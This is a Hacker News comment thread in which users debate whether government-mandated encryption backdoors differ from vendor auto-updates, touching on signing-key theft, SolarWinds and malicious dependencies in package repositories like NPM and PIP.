Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

> The illusion that a government mandated backdoor will remain accessible just to the government is not going to last much longer than the first experiment in this direction.

I'm sympathetic to that argument, but it seems to be employed very selectively by the tech industry.

We already rely on many backdoors of exactly that kind in form of mandatory auto updates. Not only is this seen as perfectly fine, it's widely regarded as a security best practice.

Why can Apple or Google or Microsoft manage to keep their signature keys secure for decades while any keys managed by a government agency would leak with mathematical certainty?



Auto updates are a big security risk themselves, it is a matter of time before someone manages to hijack a major distribution point like that (Windows, Chrome, Firefox?). Once that happens we will probably review this.

Also: who is to say that Apple, Google or Microsoft manage to keep their keys secret? Not all thieves would be stupid enough to tell, and nationstates tend to hold such advantages on ice until they have a good enough reason to use them.


> Auto updates are a big security risk themselves, it is a matter of time before someone manages to hijack a major distribution point like that (Windows, Chrome, Firefox?). Once that happens we will probably review this.

And as some lower-hanging fruit: The repos of common programming languages and things like Docker Hub.

Python PIP, NodeJS NPM, Ruby Gems, we pull in a lot of stuff from people we don't even know. Every python project installs a gazillion of stuff from its requirements.txt. At least the OS updates come from a party we at least chose to do business with.

And it's not like this is not yet happening already. But I think it'll take a major Wannacry event before we'll stop doing this because it's just so damn handy.

But if you think of it, imagine you're coding and some random 'willywonka2586' on a public slack group says "Hey I wrote a handy library for that, here, go and install it and use it in a project for your customers!". This is kinda what we're doing.


This actually happened at a company I worked for. One of the Python dependencies of some service or another had a bit of code that phoned home. It was hard to detect, because it actually did the thing it advertised it was supposed to do, just that it added the phone home part. It was only detected because the way routing works inside AWS didn't allow it to phone home, and that generated a lot of network timeouts. IIRC, it took more than 90 days before the malicious library was found out and removed.


>It was hard to detect, because it actually did the thing it advertised it was supposed to do, just that it added the phone home part.

Was it a Microsoft dependency?


NPM should be top of the suspects list there.


Ok but then where is the large-scale movement against auto updates? Stealing an update key would grant an attacker strictly more capabilities than stealing a chat backdoor key: They could still eavesdrop on all chats by patching the apps on-device, but they could also do anything else the device's OS allows them to. Nevertheless I have never read anything about the imminent risk of update compromise.


Such an attack would be soon discovered and soon mitigated. Mandating that the backdoor be present would mean you have to wait for the government to mitigate the problem 6 months later and hope that it didn't soon fall again.

At worst the entire industry in that region is broken more often than they are functional. It's also notable that companies existing in this state of brokenness would be competing with companies living in a functional world. One might find that the defective universe continues long enough its inhabitants are extinct.


As I understand it, hijacking the update backdoor already occurred with the solar winds hack.


We already had that with Solarwinds just last year


> Not only is this seen as perfectly fine, it's widely regarded as a security best practice.

It's not "perfectly fine"; but the alternative is millions of computers with known security vulnerabilities exploitable by anyone, which is far far worse than a potential backdoor used by large companies or governments.


You could make that same argument in favour of the e2e backdoor: "The risk of child groomers, terrorists etc running rampant is far greater than the risk of a few chats getting leaked."

At the very least, this would need some quantification of risk: Probability and impact of keys getting leaked vs probability and impact of not installing a backdoor.


> At the very least, this would need some quantification of risk

Yes, of course.

And in the case of autoupdates:

1. the risk of finding a RCE in any random PC within the next few years is close to 100%

2. an unpatched RCE is strictly worse than a backdoor

3. how many computers won't be patched without forced autoupdates?

In the case of e2ee, I'm afraid it's much harder to quantify, though.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: